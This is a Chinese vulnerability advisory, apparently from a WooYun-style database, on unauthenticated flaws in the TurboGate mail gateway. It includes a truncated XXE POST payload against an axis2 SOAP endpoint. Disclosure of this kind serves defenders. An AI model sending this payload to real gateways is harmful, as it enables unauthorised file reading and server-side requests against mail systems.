TurboGate邮件网关漏洞合集

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 拓波软件旗下另一款产品,用户量还是挺大的。 ### 详细说明: TurboGate其实相当于TurboMail的早期版本,TurboGate集成了大量的在TurboMail中出现的漏洞。 这里只列出无需登录即可利用的漏洞,厂商可以根据TurboMail漏洞进行自查。 1. http://**.**.**.**/bugs/wooyun-2016-0167905 在TurboGate中使用的是axis2<=1.5.1版本,存在XXE漏洞,在利用的时候需要将Content-Type设置为application/xml,POST包如下: ``` POST /services/TM_User.TM_UserHttpSoap11Endpoint/ HTTP/1.0 SOAPAction: "urn:getUserOrgList" Content-Type: application/xml Content-Length: 873 Host: **.**.**.** <?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "aaaaa">%remote;]> <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://**.**.**.**/soap/envelope/" xmlns:soap="http://**.**.**.**/wsdl/soap/" xmlns:xsd="http://**.**.**.**/1999/XMLSchema" xmlns:xsi="http://**.**.**.**/1999/XMLSchema-instance" xmlns:m0="http://**.**.**.**/" xmlns:SOAP-ENC="http://**.**.**.**/soap/encoding/" xmlns:urn="http://user.webservice.turbomail"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:getUserOrgList> <urn:apiName>${alpharand}</urn:apiName>...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息